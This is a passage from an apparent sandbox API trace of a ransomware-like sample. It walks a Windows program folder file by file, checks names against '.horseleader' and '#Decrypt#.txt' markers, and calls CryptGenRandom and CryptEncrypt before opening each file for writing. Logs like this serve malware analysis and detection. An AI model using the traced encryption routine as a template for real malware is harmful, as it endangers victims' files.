0x780000 [0251.545] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0251.545] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\*") returned 58 [0251.545] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa0fd11ff, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa787f65, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa108fe2a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0251.548] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.548] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\.") returned 58 [0251.548] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.548] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa0fd11ff, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa787f65, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa108fe2a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="..", cAlternateFileName="")) returned 1 [0251.548] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.548] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\..") returned 59 [0251.548] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.548] 
lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.548] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6faf8c48, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6faf8c48, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1240d9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11da, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="1047x576black.png", cAlternateFileName="")) returned 1 [0251.548] lstrcmpiW (lpString1="1047x576black.png", lpString2="Windows") returned -1 [0251.548] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\1047x576black.png") returned 74 [0251.548] StrStrIW (lpFirst="1047x576black.png", lpSrch=".horseleader") returned 0x0 [0251.549] lstrcmpW (lpString1="1047x576black.png", lpString2="#Decrypt#.txt") returned 1 [0251.549] lstrcmpW (lpString1="1047x576black.png", lpString2="_uninstalling_.png") returned 1 [0251.549] lstrlenW (lpString=".testttjffg") returned 11 [0251.549] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\1047x576black.png", lpSrch=".testttjffg") returned 0x0 [0251.549] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.549] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.549] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\1047x576black.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0xffffffff [0251.549] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fb1eda5, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fb1eda5, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1240d9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb05, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="15x15dot.png", cAlternateFileName="")) returned 1 [0251.549] lstrcmpiW (lpString1="15x15dot.png", lpString2="Windows") returned -1 [0251.549] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\15x15dot.png") returned 69 [0251.549] StrStrIW (lpFirst="15x15dot.png", lpSrch=".horseleader") returned 0x0 [0251.549] lstrcmpW (lpString1="15x15dot.png", lpString2="#Decrypt#.txt") returned 1 [0251.549] lstrcmpW (lpString1="15x15dot.png", lpString2="_uninstalling_.png") returned 1 [0251.550] lstrlenW (lpString=".testttjffg") returned 11 [0251.550] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\15x15dot.png", lpSrch=".testttjffg") returned 0x0 [0251.550] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.550] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.550] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\15x15dot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\15x15dot.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.551] 
FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fad2aeb, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fad2aeb, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d14a237, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x43e2, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="colorcycle.png", cAlternateFileName="")) returned 1 [0251.551] lstrcmpiW (lpString1="colorcycle.png", lpString2="Windows") returned -1 [0251.551] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\colorcycle.png") returned 71 [0251.551] StrStrIW (lpFirst="colorcycle.png", lpSrch=".horseleader") returned 0x0 [0251.551] lstrcmpW (lpString1="colorcycle.png", lpString2="#Decrypt#.txt") returned 1 [0251.551] lstrcmpW (lpString1="colorcycle.png", lpString2="_uninstalling_.png") returned 1 [0251.551] lstrlenW (lpString=".testttjffg") returned 11 [0251.551] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\colorcycle.png", lpSrch=".testttjffg") returned 0x0 [0251.551] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.551] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.552] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\colorcycle.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\colorcycle.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.552] FindNextFileW (in: hFindFile=0x7c6760, 
lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fb44f02, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fb44f02, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d14a237, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb57, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="huemainsubpicture2.png", cAlternateFileName="")) returned 1 [0251.552] lstrcmpiW (lpString1="huemainsubpicture2.png", lpString2="Windows") returned -1 [0251.552] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\huemainsubpicture2.png") returned 79 [0251.552] StrStrIW (lpFirst="huemainsubpicture2.png", lpSrch=".horseleader") returned 0x0 [0251.552] lstrcmpW (lpString1="huemainsubpicture2.png", lpString2="#Decrypt#.txt") returned 1 [0251.552] lstrcmpW (lpString1="huemainsubpicture2.png", lpString2="_uninstalling_.png") returned 1 [0251.552] lstrlenW (lpString=".testttjffg") returned 11 [0251.552] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\huemainsubpicture2.png", lpSrch=".testttjffg") returned 0x0 [0251.553] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.553] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.553] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\huemainsubpicture2.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\huemainsubpicture2.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.553] 
FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fc29730, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fc29730, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d14a237, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13e0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationLeft_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.553] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.553] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_ButtonGraphic.png") returned 89 [0251.553] StrStrIW (lpFirst="NavigationLeft_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.553] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.554] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.554] lstrlenW (lpString=".testttjffg") returned 11 [0251.554] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.554] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.554] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.554] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.554] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fbdd476, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fbdd476, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d14a237, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc3a, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationLeft_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.554] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.554] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_SelectionSubpicture.png") returned 95 [0251.554] StrStrIW (lpFirst="NavigationLeft_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.555] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.555] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.555] lstrlenW (lpString=".testttjffg") returned 11 [0251.555] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.555] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.555] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.555] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD 
Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.555] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fbdd476, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fbdd476, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d14a237, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13a1, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationRight_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.555] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.556] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationRight_ButtonGraphic.png") returned 90 [0251.556] StrStrIW (lpFirst="NavigationRight_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.556] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.556] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.556] lstrlenW (lpString=".testttjffg") returned 11 [0251.556] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationRight_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.556] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.556] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, 
dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.556] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.557] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fb911bc, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fb911bc, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d170395, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2e, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationRight_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.557] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.557] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationRight_SelectionSubpicture.png") returned 96 [0251.557] StrStrIW (lpFirst="NavigationRight_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.557] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.557] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.557] lstrlenW (lpString=".testttjffg") returned 11 [0251.557] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationRight_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.557] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, 
pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.557] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.558] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.558] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fb911bc, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fb911bc, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d170395, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x135b, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationUp_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.558] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.558] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationUp_ButtonGraphic.png") returned 87 [0251.558] StrStrIW (lpFirst="NavigationUp_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.558] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.558] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.558] lstrlenW (lpString=".testttjffg") returned 11 [0251.558] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD 
Maker\\Shared\\DvdStyles\\HueCycle\\NavigationUp_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.559] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.559] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.559] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.559] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fbb7319, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fbb7319, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d170395, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc09, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationUp_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.559] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.559] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationUp_SelectionSubpicture.png") returned 93 [0251.559] StrStrIW (lpFirst="NavigationUp_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.559] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.559] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", 
lpString2="_uninstalling_.png") returned 1 [0251.559] lstrlenW (lpString=".testttjffg") returned 11 [0251.560] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationUp_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.560] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.560] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.560] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.560] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fb6b05f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fb6b05f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d170395, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xf2f, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="title_stripe.png", cAlternateFileName="")) returned 1 [0251.560] lstrcmpiW (lpString1="title_stripe.png", lpString2="Windows") returned -1 [0251.560] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\title_stripe.png") returned 73 [0251.560] StrStrIW (lpFirst="title_stripe.png", lpSrch=".horseleader") returned 0x0 [0251.560] lstrcmpW (lpString1="title_stripe.png", lpString2="#Decrypt#.txt") returned 1 [0251.560] 
lstrcmpW (lpString1="title_stripe.png", lpString2="_uninstalling_.png") returned 1 [0251.560] lstrlenW (lpString=".testttjffg") returned 11 [0251.561] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\title_stripe.png", lpSrch=".testttjffg") returned 0x0 [0251.561] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.561] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.561] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\title_stripe.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\title_stripe.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.561] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fb6b05f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fb6b05f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d170395, 